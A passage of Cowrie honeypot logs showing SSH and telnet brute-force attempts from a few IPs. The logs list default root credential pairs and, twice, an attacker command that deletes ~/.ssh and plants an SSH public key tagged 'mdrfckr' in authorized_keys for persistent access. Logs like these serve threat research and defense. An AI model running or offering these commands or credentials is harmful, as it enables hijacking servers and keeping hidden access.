{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:51:00.433012Z","src_ip":"212.227.235.229","session":"50b17cefc013"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2@2025","message":"login attempt [test2/test2@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:51:00.506148Z","src_ip":"212.227.235.229","session":"78bd41692b2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59654,"dst_ip":"1.2.3.4","dst_port":22,"session":"13c39bdb79fb","protocol":"ssh","message":"New connection: 212.227.235.229:59654 (1.2.3.4:22) [session: 13c39bdb79fb]","sensor":"my-vps","timestamp":"2025-09-08T22:51:00.633671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:51:00.634523Z","src_ip":"212.227.235.229","session":"13c39bdb79fb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:00.667506Z","src_ip":"212.227.235.229","session":"50b17cefc013"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:51:00.734745Z","src_ip":"212.227.235.229","session":"13c39bdb79fb"}
{"eventid":"cowrie.login.failed","username":"master","password":"1234","message":"login attempt [master/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T22:51:01.174304Z","src_ip":"212.227.235.229","session":"13c39bdb79fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:51:01.259353Z","src_ip":"212.227.235.229","session":"50b17cefc013"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:51:01.260091Z","src_ip":"212.227.235.229","session":"50b17cefc013"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:51:01.495846Z","src_ip":"212.227.235.229","session":"50b17cefc013"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:01.496838Z","src_ip":"212.227.235.229","session":"50b17cefc013"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58074,"dst_ip":"1.2.3.4","dst_port":22,"session":"b512166575f2","protocol":"ssh","message":"New connection: 212.227.235.229:58074 (1.2.3.4:22) [session: b512166575f2]","sensor":"my-vps","timestamp":"2025-09-08T22:51:01.726385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:51:01.727538Z","src_ip":"212.227.235.229","session":"b512166575f2"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:01.819420Z","src_ip":"212.227.235.229","session":"78bd41692b2a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:51:01.958906Z","src_ip":"212.227.235.229","session":"b512166575f2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:02.278287Z","src_ip":"212.227.235.229","session":"13c39bdb79fb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:51:02.927705Z","src_ip":"212.227.235.229","session":"b512166575f2"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:04.161011Z","src_ip":"212.227.235.229","session":"b512166575f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58076,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d044c55d8dc","protocol":"ssh","message":"New connection: 212.227.235.229:58076 (1.2.3.4:22) [session: 5d044c55d8dc]","sensor":"my-vps","timestamp":"2025-09-08T22:51:04.391461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:51:04.392342Z","src_ip":"212.227.235.229","session":"5d044c55d8dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:51:04.622005Z","src_ip":"212.227.235.229","session":"5d044c55d8dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39218,"dst_ip":"1.2.3.4","dst_port":22,"session":"5147a6006048","protocol":"ssh","message":"New connection: 212.227.235.229:39218 (1.2.3.4:22) [session: 5147a6006048]","sensor":"my-vps","timestamp":"2025-09-08T22:51:05.275116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:51:05.276020Z","src_ip":"212.227.235.229","session":"5147a6006048"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:51:05.582158Z","src_ip":"212.227.235.229","session":"5d044c55d8dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:51:05.595916Z","src_ip":"212.227.235.229","session":"5147a6006048"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:05.814032Z","src_ip":"212.227.235.229","session":"5d044c55d8dc"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:05.815442Z","src_ip":"212.227.235.229","session":"50b17cefc013"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw@","message":"login attempt [root/1qazxsw@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:51:06.917296Z","src_ip":"212.227.235.229","session":"5147a6006048"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:51:07.626540Z","src_ip":"212.227.235.229","session":"5147a6006048"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:51:07.627241Z","src_ip":"212.227.235.229","session":"5147a6006048"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:51:07.628396Z","src_ip":"212.227.235.229","session":"5147a6006048"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:07.949572Z","src_ip":"212.227.235.229","session":"5147a6006048"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:51:08.605290Z","src_ip":"212.227.235.229","session":"5147a6006048"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:51:08.605978Z","src_ip":"212.227.235.229","session":"5147a6006048"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:51:08.928291Z","src_ip":"212.227.235.229","session":"5147a6006048"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:08.929205Z","src_ip":"212.227.235.229","session":"5147a6006048"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40722,"dst_ip":"1.2.3.4","dst_port":22,"session":"64ecab55f474","protocol":"ssh","message":"New connection: 212.227.235.229:40722 (1.2.3.4:22) [session: 64ecab55f474]","sensor":"my-vps","timestamp":"2025-09-08T22:51:09.252904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:51:09.253868Z","src_ip":"212.227.235.229","session":"64ecab55f474"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:51:09.575858Z","src_ip":"212.227.235.229","session":"64ecab55f474"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:51:10.907952Z","src_ip":"212.227.235.229","session":"64ecab55f474"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:12.233371Z","src_ip":"212.227.235.229","session":"64ecab55f474"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41800,"dst_ip":"1.2.3.4","dst_port":22,"session":"0057ab6df620","protocol":"ssh","message":"New connection: 212.227.235.229:41800 (1.2.3.4:22) [session: 0057ab6df620]","sensor":"my-vps","timestamp":"2025-09-08T22:51:12.555779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:51:12.556615Z","src_ip":"212.227.235.229","session":"0057ab6df620"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:51:12.878950Z","src_ip":"212.227.235.229","session":"0057ab6df620"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:51:14.212227Z","src_ip":"212.227.235.229","session":"0057ab6df620"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:14.532467Z","src_ip":"212.227.235.229","session":"5147a6006048"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:14.535539Z","src_ip":"212.227.235.229","session":"0057ab6df620"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49366,"dst_ip":"1.2.3.4","dst_port":22,"session":"04be264aa2d2","protocol":"ssh","message":"New connection: 212.227.235.229:49366 (1.2.3.4:22) [session: 04be264aa2d2]","sensor":"my-vps","timestamp":"2025-09-08T22:51:14.572031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:51:14.573057Z","src_ip":"212.227.235.229","session":"04be264aa2d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:51:14.825946Z","src_ip":"212.227.235.229","session":"04be264aa2d2"}
{"eventid":"cowrie.login.failed","username":"public","password":"111","message":"login attempt [public/111] failed","sensor":"my-vps","timestamp":"2025-09-08T22:51:15.879598Z","src_ip":"212.227.235.229","session":"04be264aa2d2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:17.135405Z","src_ip":"212.227.235.229","session":"04be264aa2d2"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":45530,"dst_ip":"1.2.3.4","dst_port":23,"session":"10577facea00","protocol":"telnet","message":"New connection: 176.65.149.186:45530 (1.2.3.4:23) [session: 10577facea00]","sensor":"my-vps","timestamp":"2025-09-08T22:51:22.059128Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:51:22.099025Z","src_ip":"176.65.149.186","session":"10577facea00"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:51:22.169965Z","src_ip":"176.65.149.186","session":"10577facea00"}
